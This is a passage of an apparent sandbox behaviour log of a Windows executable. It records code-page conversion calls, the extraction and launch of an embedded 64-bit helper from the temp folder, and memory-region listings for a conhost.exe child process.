!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdf\x10\x1d\x3d\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0272.505] GetLastError () returned 0x0 [0272.505] SetLastError (dwErrCode=0x0) [0272.505] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0272.505] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0272.505] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0272.505] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0272.505] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdf\x10\x1d\x3d\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0272.505] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0272.505] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0272.505] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0272.505] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0272.505] GetCurrentProcess () returned 0xffffffff [0272.505] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0272.505] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0272.505] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0272.505] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0272.506] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0272.506] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0272.506] LockResource (hResData=0x43c648) returned 0x43c648 [0272.506] GetCurrentPackageId () returned 0x3d54 [0272.506] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0272.910] GetFileType (hFile=0x170) returned 0x1 [0272.911] WriteFile (in: hFile=0x170, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x19defc, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x19defc*=0x37000, lpOverlapped=0x0) returned 1 [0272.913] WriteFile (in: hFile=0x170, lpBuffer=0x302cd8*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x19def8, lpOverlapped=0x0 | out: lpBuffer=0x302cd8*, lpNumberOfBytesWritten=0x19def8*=0x490, lpOverlapped=0x0) returned 1 [0272.914] CloseHandle (hObject=0x170) returned 1 [0272.914] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0272.914] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fac4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb08 | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x19fb08*(hProcess=0x174, hThread=0x170, dwProcessId=0xf00, dwThreadId=0xf6c)) returned 1 [0277.610] WaitForSingleObject (hHandle=0x174, dwMilliseconds=0xffffffff) returned 0x0 [0282.230] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 1 [0282.231] CloseHandle (hObject=0x174) returned 1 [0282.231] CloseHandle (hObject=0x170) returned 1 [0282.232] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0282.232] ExitProcess (uExitCode=0x0) Thread: id = 875 os_tid = 0x888 Process: id = "99" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1255f000" os_pid = "0x468" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0x974" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7153 start_va = 0x7ffc6000 end_va = 0x7ffc6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffc6000" filename = "" Region: id = 7154 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7155 start_va = 0x1231710000 end_va = 0x123172ffff entry_point = 0x0 region_type = private name = "private_0x0000001231710000" filename = "" Region: id = 7156 start_va = 0x1231730000 end_va = 0x1231743fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231730000" filename = "" Region: id = 7157 start_va = 0x1231750000 end_va = 0x123178ffff entry_point = 0x0 region_type = private name = "private_0x0000001231750000" filename = "" Region: id = 7158 start_va = 0x7df5ff6c0000 end_va = 0x7ff5ff6bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6c0000" filename = "" Region: id = 7159 start_va = 0x7ff7fc960000 end_va = 0x7ff7fc982fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc960000" filename = "" Region: id = 7160 start_va = 0x7ff7fc984000 end_va = 0x7ff7fc984fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc984000" filename = "" Region: id = 7161 start_va = 0x7ff7fc98e000 end_va = 0x7ff7fc98ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc98e000" filename = "" Region: id = 7162 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7163 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7164 start_va = 0x1231710000 end_va = 0x123171ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231710000" filename = "" Region: id = 7165 start_va = 0x1231790000 end_va = 0x123184dfff entry_point = 0x1231790000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7166 start_va = 0x1231890000 end_va = 0x123198ffff entry_point = 0x0 region_type = private name = "private_0x0000001231890000" filename = "" Region: id = 7167 start_va = 0x7ff7fc860000 end_va = 0x7ff7fc95ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc860000" filename = "" Region: id = 7168 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7169 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7170 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7171 start_va = 0x1231850000 end_va = 0x123188ffff entry_point = 0x0 region_type = private name = "private_0x0000001231850000" filename = "" Region: id = 7172 start_va = 0x1231990000 end_va = 0x1231b1ffff entry_point = 0x0 region_type = private name = "private_0x0000001231990000" filename = "" Region: id = 7173 start_va = 0x7ff7fc98c000 end_va = 0x7ff7fc98dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc98c000" filename = "" Region: id = 7174 start_va = 0x1231720000 end_va = 0x1231726fff entry_point = 0x0 region_type = private name = "private_0x0000001231720000" filename = "" Region: id = 7175 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7176 start_va = 0x1231990000 end_va = 0x1231990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231990000" filename = "" Region: id = 7177 start_va = 0x1231b10000 end_va = 0x1231b1ffff entry_point = 0x0 region_type = private name = "private_0x0000001231b10000" filename = "" Region: id = 7178 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7179 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7180 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7181 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7182 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7183 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7184 start_va = 0x12319a0000 end_va = 0x12319a6fff entry_point = 0x0 region_type = private name = "private_0x00000012319a0000" filename = "" Region: id = 7185 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7186 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7187 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7188 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7189 start_va = 0x1231b20000 end_va = 0x1231ca7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231b20000" filename = "" Region: id = 7190 start_va = 0x1231cb0000 end_va = 0x1231e30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231cb0000" filename = "" Region: id = 7191 start_va = 0x1231e40000 end_va = 0x123323ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231e40000" filename = "" Region: id = 7192 start_va = 0x12319b0000 end_va = 0x12319b0fff entry_point = 0x0 region_type = private name = "private_0x00000012319b0000" filename = "" Region: id = 7193 start_va = 0x12319c0000 end_va = 0x12319c0fff entry_point = 0x0 region_type = private name = "private_0x00000012319c0000" filename = "" Region: id = 7194 start_va = 0x12319d0000 end_va = 0x1231a6ffff entry_point = 0x0 region_type = private name = "private_0x00000012319d0000" filename = "" Region: id = 7219 start_va = 0x12319d0000 end_va = 0x1231a0ffff entry_point = 0x0 region_type = private name = "private_0x00000012319d0000" filename = "" Region: id = 7220 start_va = 0x1231a60000 end_va = 0x1231a6ffff entry_point = 0x0 region_type = private name = "private_0x0000001231a60000" filename = "" Region: id = 7221 start_va = 0x7ff7fc98a000 end_va = 0x7ff7fc98bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc98a000" filename = "" Region: id = 7222 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7223 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 7224 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7225 